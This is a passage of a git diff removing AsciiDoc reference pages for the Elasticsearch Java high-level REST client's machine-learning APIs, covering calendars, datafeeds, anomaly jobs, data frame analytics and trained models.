-include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` -<2> Optionally setting the `timeout` value for how long the -execution should wait for the job to be opened. - -[id="{upid}-{api}-response"] -==== Open {anomaly-jobs} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isOpened()` from the +{response}+ is always `true` if the job was -opened successfully. (An exception would be thrown instead if the job -was not opened successfully.) -<2> `getNode()` returns the node that the job was assigned to. If the -job is allowed to open lazily and has not yet been assigned to a node -then an empty string is returned. If `getNode()` returns `null` then -the server is an old version that does not return node information. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/post-calendar-event.asciidoc b/docs/java-rest/high-level/ml/post-calendar-event.asciidoc deleted file mode 100644 index 5baf762362b..00000000000 --- a/docs/java-rest/high-level/ml/post-calendar-event.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: post-calendar-event -:request: PostCalendarEventRequest -:response: PostCalendarEventResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Post calendar events API - -Adds new ScheduledEvents to an existing {ml} calendar. - -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Post calendar events request - -A +{request}+ is constructed with a calendar ID object -and a non-empty list of scheduled events. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Non-null existing calendar ID -<2> Non-null, non-empty collection of `ScheduledEvent` objects - - -[id="{upid}-{api}-response"] -==== Post calendar events response - -The returned +{response}+ contains the added `ScheduledEvent` objects: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `ScheduledEvent` objects that were added to the calendar - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/post-data.asciidoc b/docs/java-rest/high-level/ml/post-data.asciidoc deleted file mode 100644 index 84e0200724f..00000000000 --- a/docs/java-rest/high-level/ml/post-data.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ --- -:api: post-data -:request: PostDataRequest -:response: PostDataResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Post data API - -Posts data to an open {ml} job in the cluster. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Post data request - -A +{request}+ object gets created with an existing non-null `jobId` -and the `XContentType` being sent. Individual docs can be added -incrementally via the `PostDataRequest.JsonBuilder#addDoc` method. -These are then serialized and sent in bulk when passed to the +{request}+. - -Alternatively, the serialized bulk content can be set manually, along with its `XContentType` -through one of the other +{request}+ constructors. - -Only `XContentType.JSON` and `XContentType.SMILE` are supported. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a new `PostDataRequest.JsonBuilder` object for incrementally adding documents -<2> Add a new document as a `Map` object -<3> Add a new document as a serialized JSON formatted String. -<4> Constructing a new request referencing an opened `jobId`, and a JsonBuilder - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set the start of the bucket resetting time -<2> Set the end of the bucket resetting time - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Post data response - -A +{response}+ contains current data processing statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getDataCounts()` a `DataCounts` object containing the current -data processing counts. diff --git a/docs/java-rest/high-level/ml/preview-datafeed.asciidoc b/docs/java-rest/high-level/ml/preview-datafeed.asciidoc deleted file mode 100644 index 657c9f899fa..00000000000 --- a/docs/java-rest/high-level/ml/preview-datafeed.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: preview-datafeed -:request: PreviewDatafeedRequest -:response: PreviewDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Preview datafeeds API - -Previews a {ml} datafeed's data in the cluster. It accepts a +{request}+ object -and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Preview datafeeds request - -A +{request}+ object is created referencing a non-null `datafeedId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `datafeedId` - -[id="{upid}-{api}-response"] -==== Preview datafeeds response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The raw +BytesReference+ of the data preview -<2> A +List>+ that represents the previewed data - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/put-calendar-job.asciidoc b/docs/java-rest/high-level/ml/put-calendar-job.asciidoc deleted file mode 100644 index d13a4c59785..00000000000 --- a/docs/java-rest/high-level/ml/put-calendar-job.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: put-calendar-job -:request: PutCalendarJobRequest -:response: PutCalendarResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {anomaly-jobs} in calendar API - -Adds {anomaly-jobs} jobs to an existing {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Put {anomaly-jobs} in calendar request - -A +{request}+ is constructed referencing a non-null -calendar ID, and JobIDs to which to add to the calendar - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the calendar to which to add the jobs -<2> The JobIds to add to the calendar - -[id="{upid}-{api}-response"] -==== Put {anomaly-jobs} in calendar response - -The returned +{response}+ contains the updated calendar: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated calendar - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/put-calendar.asciidoc b/docs/java-rest/high-level/ml/put-calendar.asciidoc deleted file mode 100644 index f37192ab634..00000000000 --- a/docs/java-rest/high-level/ml/put-calendar.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: put-calendar -:request: PutCalendarRequest -:response: PutCalendarResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put calendars API - -Creates a new {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Put calendars request - -A +{request}+ is constructed with a calendar object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a request with the given calendar. - - -[id="{upid}-{api}-response"] -==== Put calendars response - -The returned +{response}+ contains the created calendar: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The created calendar. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/put-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/put-data-frame-analytics.asciidoc deleted file mode 100644 index db54d545866..00000000000 --- a/docs/java-rest/high-level/ml/put-data-frame-analytics.asciidoc +++ /dev/null @@ -1,175 +0,0 @@ --- -:api: put-data-frame-analytics -:request: PutDataFrameAnalyticsRequest -:response: PutDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {dfanalytics-jobs} API - -experimental::[] - -Creates a new {dfanalytics-job}. -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put {dfanalytics-jobs} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {dfanalytics-job} to create - -[id="{upid}-{api}-config"] -==== {dfanalytics-cap} configuration - -The `DataFrameAnalyticsConfig` object contains all the details about the {dfanalytics-job} -configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The {dfanalytics-job} ID -<2> The source index and query from which to gather data -<3> The destination index -<4> The analysis to be performed -<5> The fields to be included in / excluded from the analysis -<6> The memory limit for the model created as part of the analysis process -<7> Optionally, a human-readable description -<8> The maximum number of threads to be used by the analysis. Defaults to 1. - -[id="{upid}-{api}-query-config"] - -==== SourceConfig - -The index and the query from which to collect data. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-config] --------------------------------------------------- -<1> Constructing a new DataFrameAnalyticsSource -<2> The source index -<3> The query from which to gather the data. If query is not set, a `match_all` query is used by default. -<4> Source filtering to select which fields will exist in the destination index. - -===== QueryConfig - -The query with which to select data from the source. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-config] --------------------------------------------------- - -==== DestinationConfig - -The index to which data should be written by the {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-dest-config] --------------------------------------------------- -<1> Constructing a new DataFrameAnalyticsDest -<2> The destination index - -==== Analysis - -The analysis to be performed. -Currently, the supported analyses include: +OutlierDetection+, +Classification+, +Regression+. - -===== Outlier detection - -+OutlierDetection+ analysis can be created in one of two ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-outlier-detection-default] --------------------------------------------------- -<1> Constructing a new OutlierDetection object with default strategy to determine outliers - -or -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-outlier-detection-customized] --------------------------------------------------- -<1> Constructing a new OutlierDetection object -<2> The method used to perform the analysis -<3> Number of neighbors taken into account during analysis -<4> The min `outlier_score` required to compute feature influence -<5> Whether to compute feature influence -<6> The proportion of the data set that is assumed to be outlying prior to outlier detection -<7> Whether to apply standardization to feature values - -===== Classification - -+Classification+ analysis requires to set which is the +dependent_variable+ and -has a number of other optional parameters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-classification] --------------------------------------------------- -<1> Constructing a new Classification builder object with the required dependent variable -<2> The lambda regularization parameter. A non-negative double. -<3> The gamma regularization parameter. A non-negative double. -<4> The applied shrinkage. A double in [0.001, 1]. -<5> The maximum number of trees the forest is allowed to contain. An integer in [1, 2000]. -<6> The fraction of features which will be used when selecting a random bag for each candidate split. A double in (0, 1]. -<7> If set, feature importance for the top most important features will be computed. -<8> The name of the prediction field in the results object. -<9> The percentage of training-eligible rows to be used in training. Defaults to 100%. -<10> The seed to be used by the random generator that picks which rows are used in training. -<11> The optimization objective to target when assigning class labels. Defaults to maximize_minimum_recall. -<12> The number of top classes (or -1 which denotes all classes) to be reported in the results. Defaults to 2. -<13> Custom feature processors that will create new features for analysis from the included document - fields. Note, automatic categorical {ml-docs}/ml-feature-encoding.html[feature encoding] still occurs for all features. - -===== Regression - -+Regression+ analysis requires to set which is the +dependent_variable+ and -has a number of other optional parameters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-regression] --------------------------------------------------- -<1> Constructing a new Regression builder object with the required dependent variable -<2> The lambda regularization parameter. A non-negative double. -<3> The gamma regularization parameter. A non-negative double. -<4> The applied shrinkage. A double in [0.001, 1]. -<5> The maximum number of trees the forest is allowed to contain. An integer in [1, 2000]. -<6> The fraction of features which will be used when selecting a random bag for each candidate split. A double in (0, 1]. -<7> If set, feature importance for the top most important features will be computed. -<8> The name of the prediction field in the results object. -<9> The percentage of training-eligible rows to be used in training. Defaults to 100%. -<10> The seed to be used by the random generator that picks which rows are used in training. -<11> The loss function used for regression. Defaults to `mse`. -<12> An optional parameter to the loss function. -<13> Custom feature processors that will create new features for analysis from the included document -fields. Note, automatic categorical {ml-docs}/ml-feature-encoding.html[feature encoding] still occurs for all features. - -==== Analyzed fields - -FetchContext object containing fields to be included in / excluded from the analysis - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-analyzed-fields] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the newly created {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/put-datafeed.asciidoc b/docs/java-rest/high-level/ml/put-datafeed.asciidoc deleted file mode 100644 index e2738a555a0..00000000000 --- a/docs/java-rest/high-level/ml/put-datafeed.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ --- -:api: put-datafeed -:request: PutDatafeedRequest -:response: PutDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put datafeeds API - -Creates a new {ml} datafeed in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put datafeeds request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {ml} datafeed to create. - -[id="{upid}-{api}-config"] -==== Datafeed configuration - -The `DatafeedConfig` object contains all the details about the {ml} datafeed -configuration. - -A `DatafeedConfig` requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The datafeed ID and the {anomaly-job} ID. -<2> The indices that contain the data to retrieve and feed into the {anomaly-job}. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-chunking-config] --------------------------------------------------- -<1> Specifies how data searches are split into time chunks. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-frequency] --------------------------------------------------- -<1> The interval at which scheduled queries are made while the datafeed runs in -real time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-query] --------------------------------------------------- -<1> A query to filter the search results by. Defaults to the `match_all` query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-query-delay] --------------------------------------------------- -<1> The time interval behind real time that data is queried. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-delayed-data-check-config] --------------------------------------------------- -<1> Sets the delayed data check configuration. -The window must be larger than the Job's bucket size, but smaller than 24 hours, -and span less than 10,000 buckets. -Defaults to `null`, which causes an appropriate window span to be calculated when -the datafeed runs. -The default `check_window` span calculation is the max between `2h` or -`8 * bucket_span`. To explicitly disable, pass -`DelayedDataCheckConfig.disabledDelayedDataCheckConfig()`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-script-fields] --------------------------------------------------- -<1> Allows the use of script fields. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-scroll-size] --------------------------------------------------- -<1> The `size` parameter used in the searches. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the new {ml} datafeed if it has been successfully created. This will -contain the creation time and other fields initialized using -default values: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The created datafeed. diff --git a/docs/java-rest/high-level/ml/put-filter.asciidoc b/docs/java-rest/high-level/ml/put-filter.asciidoc deleted file mode 100644 index f6de5e07011..00000000000 --- a/docs/java-rest/high-level/ml/put-filter.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ --- -:api: put-filter -:request: PutFilterRequest -:response: PutFilterResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put filters API - -Creates a new {ml} filter in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put filters request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {ml} filter to create as a `MlFilter` - -[id="{upid}-{api}-config"] -==== Filter configuration - -The `MlFilter` object contains all the details about the {ml} filter -configuration. - -A `MlFilter` contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> Required, the filter ID -<2> Optional, the filter description -<3> Optional, the items of the filter. A wildcard * can be used at the beginning or the end of an item. -Up to 10000 items are allowed in each filter. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the new {ml} filter if it has been successfully created. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The newly created `MlFilter` diff --git a/docs/java-rest/high-level/ml/put-job.asciidoc b/docs/java-rest/high-level/ml/put-job.asciidoc deleted file mode 100644 index add7fcdc6e5..00000000000 --- a/docs/java-rest/high-level/ml/put-job.asciidoc +++ /dev/null @@ -1,129 +0,0 @@ --- -:api: put-job -:request: PutJobRequest -:response: PutJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {anomaly-jobs} API - -Creates a new {anomaly-job} in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put {anomaly-jobs} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {anomaly-job} to create as a `Job` - -[id="{upid}-{api}-config"] -==== Job configuration - -The `Job` object contains all the details about the {anomaly-job} -configuration. - -A `Job` requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The job ID -<2> An analysis configuration -<3> A data description -<4> Optionally, a human-readable description - -[id="{upid}-{api}-analysis-config"] -==== Analysis configuration - -The analysis configuration of the {anomaly-job} is defined in the `AnalysisConfig`. -`AnalysisConfig` reflects all the configuration -settings that can be defined using the REST API. - -Using the REST API, we could define this analysis configuration: - -[source,js] --------------------------------------------------- -"analysis_config" : { - "bucket_span" : "10m", - "detectors" : [ - { - "detector_description" : "Sum of total", - "function" : "sum", - "field_name" : "total" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -Using the `AnalysisConfig` object and the high level REST client, the list -of detectors must be built first. - -An example of building a `Detector` instance is as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-detector] --------------------------------------------------- -<1> The function to use -<2> The field to apply the function to -<3> Optionally, a human-readable description - -Then the same configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-analysis-config] --------------------------------------------------- -<1> Create a list of detectors -<2> Pass the list of detectors to the analysis config builder constructor -<3> The bucket span - -[id="{upid}-{api}-data-description"] -==== Data description - -After defining the analysis config, the next thing to define is the -data description, using a `DataDescription` instance. `DataDescription` -reflects all the configuration settings that can be defined using the -REST API. - -Using the REST API, we could define this metrics configuration: - -[source,js] --------------------------------------------------- -"data_description" : { - "time_field" : "timestamp" -} --------------------------------------------------- -// NOTCONSOLE - -Using the `DataDescription` object and the high level REST client, the same -configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-data-description] --------------------------------------------------- -<1> The time field - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the new {ml} job if it has been successfully created. This will -contain the creation time and other fields initialized using -default values: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The creation time is a field that was not passed in the `Job` object in the request diff --git a/docs/java-rest/high-level/ml/put-trained-model.asciidoc b/docs/java-rest/high-level/ml/put-trained-model.asciidoc deleted file mode 100644 index d8c32015a50..00000000000 --- a/docs/java-rest/high-level/ml/put-trained-model.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ --- -:api: put-trained-model -:request: PutTrainedModelRequest -:response: PutTrainedModelResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put trained models API - -experimental:[] - -experimental::[] - -Creates a new trained model for inference. -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put trained models request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {infer} trained model to create - -[id="{upid}-{api}-config"] -==== Trained model configuration - -The `TrainedModelConfig` object contains all the details about the trained model -configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The {infer} definition for the model -<2> Optionally, if the {infer} definition is large, you may choose to compress it for transport. - Do not supply both the compressed and uncompressed definitions. -<3> The unique model id -<4> The input field names for the model definition -<5> Optionally, a human-readable description -<6> Optionally, an object map contain metadata about the model -<7> Optionally, an array of tags to organize the model -<8> The default inference config to use with the model. Must match the underlying - definition target_type. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the newly created trained model. -The +{response}+ will omit the model definition as a precaution against -streaming large model definitions back to the client. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/revert-model-snapshot.asciidoc b/docs/java-rest/high-level/ml/revert-model-snapshot.asciidoc deleted file mode 100644 index b6785299b52..00000000000 --- a/docs/java-rest/high-level/ml/revert-model-snapshot.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ --- -:api: revert-model-snapshot -:request: RevertModelSnapshotRequest -:response: RevertModelSnapshotResponse --- -[role="xpack"] - -[id="{upid}-{api}"] -=== Revert model snapshots API - -Reverts to a previous {ml} model snapshot. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Revert model snapshots request - -A +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing existing `jobId` and `snapshotId` values. - -==== Optional arguments - -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-delete-intervening-results] --------------------------------------------------- -<1> A flag indicating whether or not results in the period between the timestamp on the reverted snapshot and the latest results should be deleted - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Revert job response - -A +{response}+ contains the full representation of the reverted `ModelSnapshot`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The reverted `ModelSnapshot` diff --git a/docs/java-rest/high-level/ml/set-upgrade-mode.asciidoc b/docs/java-rest/high-level/ml/set-upgrade-mode.asciidoc deleted file mode 100644 index d19a0d66360..00000000000 --- a/docs/java-rest/high-level/ml/set-upgrade-mode.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: set-upgrade-mode -:request: SetUpgradeModeRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Set upgrade mode API - -Temporarily halts all {ml} job and {dfeed} tasks when `enabled=true`. Their -reported states remain unchanged. Consequently, when exiting upgrade mode the halted {ml} jobs and -{dfeeds} will return to their previous state. - -It accepts a +{request}+ object and responds with a +{response}+ object. - -When `enabled=true`, no new jobs can be opened, and no job or {dfeed} tasks will -be running. Be sure to set `enabled=false` once upgrade actions are completed. - -[id="{upid}-{api}-request"] -==== Set upgrade mode request - -A +{request}+ object gets created setting the desired `enabled` state. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing enabling upgrade mode -<2> Optionally setting the `timeout` value for how long the -execution should wait. - -[id="{upid}-{api}-response"] -==== Set upgrade mode response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged()` from the +{response}+ indicates if the setting was set successfully. - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/start-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/start-data-frame-analytics.asciidoc deleted file mode 100644 index 6bfc9fff089..00000000000 --- a/docs/java-rest/high-level/ml/start-data-frame-analytics.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: start-data-frame-analytics -:request: StartDataFrameAnalyticsRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start {dfanalytics-jobs} API - -experimental::[] - -Starts an existing {dfanalytics-job}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Start {dfanalytics-jobs} request - -A +{request}+ object requires a {dfanalytics-job} ID. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new start request referencing an existing {dfanalytics-job} - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Start {dfanalytics-jobs} response - -The returned +{response}+ object acknowledges the {dfanalytics-job} has started. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getNode()` returns the node that the job was assigned to. If the -job is allowed to open lazily and has not yet been assigned to a node -then an empty string is returned. If `getNode()` returns `null` then -the server is an old version that does not return node information. diff --git a/docs/java-rest/high-level/ml/start-datafeed.asciidoc b/docs/java-rest/high-level/ml/start-datafeed.asciidoc deleted file mode 100644 index a54695bf821..00000000000 --- a/docs/java-rest/high-level/ml/start-datafeed.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ --- -:api: start-datafeed -:request: StartDatafeedRequest -:response: StartDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start {dfeeds} API - -Starts a {ml} {dfeed} in the cluster. It accepts a +{request}+ object and -responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Start {dfeeds} request - -A +{request}+ object is created referencing a non-null `datafeedId`. -All other fields are optional for the request. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `datafeedId`. - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set when the {dfeed} should end, the value is exclusive. -May be an epoch seconds, epoch millis or an ISO 8601 string. -"now" is a special value that indicates the current time. -If you do not specify an end time, the {dfeed} runs continuously. -<2> Set when the {dfeed} should start, the value is inclusive. -May be an epoch seconds, epoch millis or an ISO 8601 string. -If you do not specify a start time and the {dfeed} is associated with a new job, -the analysis starts from the earliest time for which data is available. -<3> Set the timeout for the request - -[id="{upid}-{api}-response"] -==== Start {dfeeds} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isStarted()` from the +{response}+ is always `true` if the {dfeed} was -started successfully. (An exception would be thrown instead if the {dfeed} -was not started successfully.) -<2> `getNode()` returns the node that the {dfeed} was assigned to. If the -{dfeed} is allowed to open lazily and has not yet been assigned to a node -then an empty string is returned. If `getNode()` returns `null` then -the server is an old version that does not return node information. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/stop-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/stop-data-frame-analytics.asciidoc deleted file mode 100644 index 58c66b472fc..00000000000 --- a/docs/java-rest/high-level/ml/stop-data-frame-analytics.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: stop-data-frame-analytics -:request: StopDataFrameAnalyticsRequest -:response: StopDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop {dfanalytics-jobs} API - -experimental::[] - -Stops a running {dfanalytics-job}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Stop {dfanalytics-jobs} request - -A +{request}+ object requires a {dfanalytics-job} ID. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new stop request referencing an existing {dfanalytics-job} -<2> Optionally used to stop a failed task - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the {dfanalytics-job} has stopped. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/stop-datafeed.asciidoc b/docs/java-rest/high-level/ml/stop-datafeed.asciidoc deleted file mode 100644 index 8b94bea8713..00000000000 --- a/docs/java-rest/high-level/ml/stop-datafeed.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: stop-datafeed -:request: StopDatafeedRequest -:response: StopDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop datafeeds API - -Stops a {ml} datafeed in the 